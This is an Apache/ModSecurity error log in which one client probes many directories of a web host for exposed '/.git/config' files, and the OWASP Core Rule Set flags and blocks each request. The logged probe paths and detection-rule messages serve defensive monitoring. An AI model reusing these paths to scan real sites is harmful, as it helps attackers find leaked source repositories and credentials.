[Thu May 23 21:50:58.379590 2024] [:error] [pid 3431457] [client 104.234.204.32:45588] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /images/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/images/.git/config"] [unique_id "Zk-eIsDLXjxS3Q8qbGS2kQAAAAk"]
[Thu May 23 21:50:58.380092 2024] [:error] [pid 3431457] [client 104.234.204.32:45588] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/images/.git/config"] [unique_id "Zk-eIsDLXjxS3Q8qbGS2kQAAAAk"]
[Thu May 23 21:50:58.380487 2024] [:error] [pid 3431457] [client 104.234.204.32:45588] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/images/.git/config"] [unique_id "Zk-eIsDLXjxS3Q8qbGS2kQAAAAk"]
[Thu May 23 21:50:58.383215 2024] [:error] [pid 3414898] [client 104.234.204.32:45598] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /includes/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/includes/.git/config"] [unique_id "Zk-eItPWiUkCMq8Nf8lwrQAAAAg"]
[Thu May 23 21:50:58.383733 2024] [:error] [pid 3414898] [client 104.234.204.32:45598] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/includes/.git/config"] [unique_id "Zk-eItPWiUkCMq8Nf8lwrQAAAAg"]
[Thu May 23 21:50:58.384117 2024] [:error] [pid 3414898] [client 104.234.204.32:45598] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/includes/.git/config"] [unique_id "Zk-eItPWiUkCMq8Nf8lwrQAAAAg"]
[Thu May 23 21:50:58.389163 2024] [:error] [pid 3413215] [client 104.234.204.32:45614] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /info/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/info/.git/config"] [unique_id "Zk-eIsTZAE7eF0447XNsvAAAAAU"]
[Thu May 23 21:50:58.389372 2024] [:error] [pid 3413215] [client 104.234.204.32:45614] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/info/.git/config"] [unique_id "Zk-eIsTZAE7eF0447XNsvAAAAAU"]
[Thu May 23 21:50:58.389535 2024] [:error] [pid 3413215] [client 104.234.204.32:45614] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/info/.git/config"] [unique_id "Zk-eIsTZAE7eF0447XNsvAAAAAU"]
[Thu May 23 21:50:58.389736 2024] [:error] [pid 3413214] [client 104.234.204.32:45628] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /js/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/js/.git/config"] [unique_id "Zk-eIpzctTAUN3VLWY6UFwAAAAQ"]
[Thu May 23 21:50:58.390440 2024] [:error] [pid 3413214] [client 104.234.204.32:45628] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/js/.git/config"] [unique_id "Zk-eIpzctTAUN3VLWY6UFwAAAAQ"]
[Thu May 23 21:50:58.390929 2024] [:error] [pid 3413214] [client 104.234.204.32:45628] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/js/.git/config"] [unique_id "Zk-eIpzctTAUN3VLWY6UFwAAAAQ"]
[Thu May 23 21:50:58.393533 2024] [authz_core:error] [pid 3414863] [client 104.234.204.32:45630] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.git
[Thu May 23 21:50:58.442459 2024] [:error] [pid 3413212] [client 104.234.204.32:45634] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /live/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/live/.git/config"] [unique_id "Zk-eIvkOOvNcESBtKtopEAAAAAI"]
[Thu May 23 21:50:58.442931 2024] [:error] [pid 3413212] [client 104.234.204.32:45634] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/live/.git/config"] [unique_id "Zk-eIvkOOvNcESBtKtopEAAAAAI"]
[Thu May 23 21:50:58.443307 2024] [:error] [pid 3413212] [client 104.234.204.32:45634] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/live/.git/config"] [unique_id "Zk-eIvkOOvNcESBtKtopEAAAAAI"]
[Thu May 23 21:50:58.474542 2024] [:error] [pid 3413213] [client 104.234.204.32:45650] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /log/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/log/.git/config"] [unique_id "Zk-eIkRtqfe68Tkm9lTptAAAAAM"]
[Thu May 23 21:50:58.474976 2024] [:error] [pid 3413213] [client 104.234.204.32:45650] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/log/.git/config"] [unique_id "Zk-eIkRtqfe68Tkm9lTptAAAAAM"]
[Thu May 23 21:50:58.475319 2024] [:error] [pid 3413213] [client 104.234.204.32:45650] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/log/.git/config"] [unique_id "Zk-eIkRtqfe68Tkm9lTptAAAAAM"]
[Thu May 23 21:50:58.508365 2024] [:error] [pid 3413210] [client 104.234.204.32:45652] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /m/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/m/.git/config"] [unique_id "Zk-eImikoYj9w0kALAhtRwAAAAA"]
[Thu May 23 21:50:58.509003 2024] [:error] [pid 3413210] [client 104.234.204.32:45652] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/m/.git/config"] [unique_id "Zk-eImikoYj9w0kALAhtRwAAAAA"]
[Thu May 23 21:50:58.509481 2024] [:error] [pid 3413210] [client 104.234.204.32:45652] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/m/.git/config"] [unique_id "Zk-eImikoYj9w0kALAhtRwAAAAA"]
[Thu May 23 21:50:58.576853 2024] [:error] [pid 3413433] [client 104.234.204.32:45660] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /modules/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/modules/.git/config"] [unique_id "Zk-eIjaPQQ881d8bAu5nRQAAAAY"]
[Thu May 23 21:50:58.577086 2024] [:error] [pid 3413211] [client 104.234.204.32:45674] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /new/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.git/config"] [unique_id "Zk-eIvWGyBPySR9VLpy1lQAAAAE"]
[Thu May 23 21:50:58.577416 2024] [:error] [pid 3413433] [client 104.234.204.32:45660] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/modules/.git/config"] [unique_id "Zk-eIjaPQQ881d8bAu5nRQAAAAY"]
[Thu May 23 21:50:58.577706 2024] [:error] [pid 3413211] [client 104.234.204.32:45674] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/new/.git/config"] [unique_id "Zk-eIvWGyBPySR9VLpy1lQAAAAE"]
[Thu May 23 21:50:58.577814 2024] [:error] [pid 3413433] [client 104.234.204.32:45660] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/modules/.git/config"] [unique_id "Zk-eIjaPQQ881d8bAu5nRQAAAAY"]
[Thu May 23 21:50:58.578130 2024] [:error] [pid 3413211] [client 104.234.204.32:45674] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/new/.git/config"] [unique_id "Zk-eIvWGyBPySR9VLpy1lQAAAAE"]
[Thu May 23 21:50:58.599327 2024] [:error] [pid 3414898] [client 104.234.204.32:45684] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /node_modules/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/node_modules/.git/config"] [unique_id "Zk-eItPWiUkCMq8Nf8lwrgAAAAg"]
[Thu May 23 21:50:58.599809 2024] [:error] [pid 3414898] [client 104.234.204.32:45684] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/node_modules/.git/config"] [unique_id "Zk-eItPWiUkCMq8Nf8lwrgAAAAg"]
[Thu May 23 21:50:58.600191 2024] [:error] [pid 3414898] [client 104.234.204.32:45684] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/node_modules/.git/config"] [unique_id "Zk-eItPWiUkCMq8Nf8lwrgAAAAg"]
[Thu May 23 21:50:58.603162 2024] [:error] [pid 3431457] [client 104.234.204.32:45700] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /old-cuburn/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/old-cuburn/.git/config"] [unique_id "Zk-eIsDLXjxS3Q8qbGS2kgAAAAk"]
[Thu May 23 21:50:58.603624 2024] [:error] [pid 3431457] [client 104.234.204.32:45700] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/old-cuburn/.git/config"] [unique_id "Zk-eIsDLXjxS3Q8qbGS2kgAAAAk"]
[Thu May 23 21:50:58.604033 2024] [:error] [pid 3431457] [client 104.234.204.32:45700] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/old-cuburn/.git/config"] [unique_id "Zk-eIsDLXjxS3Q8qbGS2kgAAAAk"]
[Thu May 23 21:50:58.612641 2024] [:error] [pid 3414863] [client 104.234.204.32:45712] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /php/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/php/.git/config"] [unique_id "Zk-eIrlcUE7FzAkWB0OTsAAAAAc"]
[Thu May 23 21:50:58.612868 2024] [:error] [pid 3414863] [client 104.234.204.32:45712] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/php/.git/config"] [unique_id "Zk-eIrlcUE7FzAkWB0OTsAAAAAc"]
[Thu May 23 21:50:58.613033 2024] [:error] [pid 3414863] [client 104.234.204.32:45712] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/php/.git/config"] [unique_id "Zk-eIrlcUE7FzAkWB0OTsAAAAAc"]
[Thu May 23 21:50:58.614263 2024] [:error] [pid 3413215] [client 104.234.204.32:45720] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /plugins/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.git/config"] [unique_id "Zk-eIsTZAE7eF0447XNsvQAAAAU"]
[Thu May 23 21:50:58.614476 2024] [:error] [pid 3413215] [client 104.234.204.32:45720] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.git/config"] [unique_id "Zk-eIsTZAE7eF0447XNsvQAAAAU"]
[Thu May 23 21:50:58.614643 2024] [:error] [pid 3413215] [client 104.234.204.32:45720] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.git/config"] [unique_id "Zk-eIsTZAE7eF0447XNsvQAAAAU"]
[Thu May 23 21:50:58.615785 2024] [:error] [pid 3413214] [client 104.234.204.32:45736] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /private/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/private/.git/config"] [unique_id "Zk-eIpzctTAUN3VLWY6UGAAAAAQ"]
